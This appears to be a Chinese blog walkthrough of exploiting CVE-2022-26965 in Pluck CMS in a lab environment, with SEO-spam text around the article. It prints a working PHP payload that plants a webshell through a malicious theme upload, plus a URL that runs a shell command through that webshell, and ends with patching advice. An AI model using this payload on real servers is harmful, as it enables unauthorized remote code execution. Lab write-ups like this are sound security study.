当前位置: 首页 > news >正文

重庆建设厅网站安远做网站

重庆建设厅网站,安远做网站,佛山网站建设价格多少,微信网站建设信息简介 CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞。 攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。 过程 1.打开环境,查看源码,发现login.php 2.进…

简介

CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞

攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。

过程

1.打开环境,查看源码,发现login.php

2.进入查看,登陆页面,弱口令admin进行登录,全英文界面,可以翻译的哈

3.找到上传cms主题界面

4.去github下载相对应的版本主题,随便下载一个就行

https://github.com/billcreswell/redline-theme

5.下载完成之后将文件里面的info.php里面的内容修改为下面的代码

<?phpfile_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));?>

解释:使用file_put_contents函数将经过Base64解码后的字符串写入一个名为testshell.php的文件。

6.修改好的文件进行上传

文件上传成功。

7.连接

http://eci-2ze33y4rj8565dqp15iy.cloudeci1.ichunqiu.com/testshell.php?1=cat%20/flag

成功。

解决方案

这个漏洞的解决方案是升级Pluck CMS到最新版本或打上已知的修补程序。

攻击者利用该漏洞一般会执行一些恶意代码,包括上传一些特定的主题包,然后执行一些远程命令,从而获取服务器的控制权限,因此升级或打上修补程序是解决该漏洞最直接有效的方法。

除此之外,管理员还可以通过限制主题包的上传权限、对服务器进行安全扫描和加固等措施来提高系统的安全性。

http://www.yayakq.cn/news/395896/

相关文章:

  • 网站建设信息在哪儿发布wordpress微信关注查看
  • 建站saas小皮搭建本地网站
  • 织梦模仿网站视频php 多语言网站建设源码
  • 涂料做哪个网站好建设厅投诉网站首页
  • 网站建设翻译成英文微信公众号平台官网网址
  • 基于wed的网站开发网站模板怎么设计软件
  • 新手学做网站要花钱么加强网站建设的
  • 网站设计的书优购物
  • 宁夏固原住房和建设局网站局域网内服务器做网站
  • 网站左悬浮代码免费咨询产科医生
  • 企业门户网站建设费用如何找外贸公司
  • 建设自己的企业网站需要什么资料网站域名备案注册证书
  • 安吉网站开发在线做3d交互的网站
  • 自助建站之星网站集群 建设方案
  • 广州学建设网站淘宝新店怎么快速做起来
  • 俄语网站wordpress memcached插件
  • 专业的外贸行业网站制作湖南省新闻最新消息十条
  • 常见的网站攻击方式宁乡小程序开发
  • 网站开发有哪些术语怎么运行wordpress
  • 网站镜像代理怎么做免费平台
  • 五站合一自建网站城市分站cms
  • 天河区建设网站想建立什么网站
  • 网站微建站义乌网图科技有限公司怎么样
  • 渭南汽车网站制作软件开发培训学校驾校宝典
  • 一个空间做两个网站如何选网站建设公司
  • 写网站建设需求网站维护报价表
  • 网站设计管理方向展示型网站企业网站建设
  • 王磊网站建设东莞常平镇邮政编码
  • 河南中原建设公司网站无锡网站制作优化
  • 个人备案网站描述外国的贸易网站